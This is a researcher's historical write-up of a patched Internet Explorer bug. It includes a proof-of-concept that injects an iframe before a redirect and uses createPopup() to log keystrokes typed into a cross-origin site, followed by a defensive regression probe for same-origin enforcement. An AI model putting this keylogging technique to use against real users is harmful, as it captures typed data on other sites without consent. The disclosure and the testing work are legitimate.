This one surprised me. By injecting an iframe into a newly opened window before it redirected to the target site, and then calling createPopup() from that injected frame, I could attach a keylogger that remained visible and functional even after the window navigated to a completely different domain.
<script>
  function main()
  {
    // Open a same-origin page that immediately redirects to the target site (Bing here).
    var win = window.open("redir.aspx"); // redirects to Bing (or any target)

    // While the new window still holds the same-origin pre-redirect document,
    // inject an iframe into it. This has to happen before the redirect lands.
    win.document.appendChild(win.document.createElement("iframe"));

    // win[0] is the injected frame's window. createPopup() is an IE-only API;
    // the popup it returned survived the parent window navigating to another origin.
    var cp = win[0].createPopup();
    cp.document.bgColor = "blue";
    cp.document.body.innerHTML =
      '<div style="font-family:Arial;font-size:12px;color:#ffffff;">' +
      '  We capture every keystroke.<br />' +
      '  <span style="color:red;font-weight:bold;" id="typedText"> </span>' +
      '</div>' +
      // Keypress handler inside the popup's own document. document.all and
      // event.keyCode are IE-era APIs, kept as in the original.
      '<script defer="defer">' +
      '  document.onkeypress = function(){' +
      '    document.all.typedText.innerText += String.fromCharCode(event.keyCode);' +
      '  }' +
      '<\/script>';

    // Show the popup at x=200, y=0 with width 700 and height 120 pixels.
    cp.show(200, 0, 700, 120);
  }
</script>
<input type="button" onclick="main()" value="Open new window and show createPopup()">
The trick was the timing: appending the iframe to the new window’s document happened before the redirect completed. Once the redirect landed on Bing, the popup created from the injected frame was still alive and capturing keystrokes typed into Bing’s search box. This was a follow-up to an earlier variant (WOOBR #1133976) that used createPopup directly on the opener window.
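The property this bug broke is that, once the opened window has landed on another origin, the opener must lose DOM access to it and to anything it injected beforehand. The following is an added regression probe written for this write-up, not code from the original post or from Microsoft: it repeats the setup above in a current browser (open a window, inject an iframe before the redirect completes, keep a handle to the injected frame's window), then repeatedly checks whether the opener can still reach the window's document or the frame's document, and whether an IE-style createPopup function is exposed on the frame. It assumes, as the original did, that "redir.aspx" is a same-origin page that redirects to a cross-origin target; that page, the polling interval and the helper names are illustrative choices. The classification helpers are pure functions so they can be exercised with stub objects outside a browser; the browser part only runs when a `window` exists.

```javascript
// Classify one attempt to touch a window's DOM from the opener.
// Returns "reachable", "blocked" (the browser threw, e.g. SecurityError
// under the same-origin policy) or "gone" (no handle, or the window/frame
// was closed or discarded). Pure, so it also works on a stub object.
function probeAccess(win) {
  if (!win || win.closed) return "gone";
  try {
    // Cross-origin: even reading .document must throw.
    void win.document.body;
    return "reachable";
  } catch (e) {
    return "blocked";
  }
}

// Summarize the opened window and the injected frame in one object.
// createPopup is checked only when the frame is still reachable, because
// reading an arbitrary property of a cross-origin window also throws.
function summarize(win, frameWin) {
  var frameState = probeAccess(frameWin);
  return {
    window: probeAccess(win),
    frame: frameState,
    createPopup: frameState === "reachable" && typeof frameWin.createPopup === "function"
  };
}

// True when the post-navigation state would indicate the bug class above:
// the opener can still reach the frame it injected after the window moved
// to another origin. (window === "blocked" is what should happen; anything
// still "reachable" at that point is a same-origin-policy bypass.)
function indicatesBypass(after) {
  return after.window === "blocked" && after.frame === "reachable";
}

// Browser entry point. ASSUMPTION: "redir.aspx" is same-origin and redirects
// cross-origin, exactly as in the original snippet.
function runProbe() {
  var win = window.open("redir.aspx");
  var iframe = win.document.createElement("iframe");
  win.document.documentElement.appendChild(iframe);
  var frameWin = iframe.contentWindow; // handle kept across the redirect
  var before = summarize(win, frameWin);
  var timer = setInterval(function () {
    var after = summarize(win, frameWin);
    // Keep polling until the navigated document has actually replaced the
    // pre-redirect one; the cross-origin page shows up as "blocked".
    if (after.window === "blocked" || after.window === "gone") {
      clearInterval(timer);
      console.log("before redirect:", before);
      console.log("after redirect:", after);
      console.log("bypass indicated:", indicatesBypass(after));
    }
  }, 250);
}

if (typeof window !== "undefined" && typeof window.open === "function") {
  // Only auto-run inside a browser page; under Node there is no window.
  runProbe();
}
```

In any current browser the expected "after" state is window "blocked" and frame "blocked" or "gone", with createPopup false (the API only ever existed in Internet Explorer). Run it from a page on the same origin as the redirecting page; the browser's popup blocker must allow the window, which is why the original triggered it from a button click.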
Found during my years at Microsoft (2006–2014). These bugs were patched long ago — shared here as a historical record for learning purposes.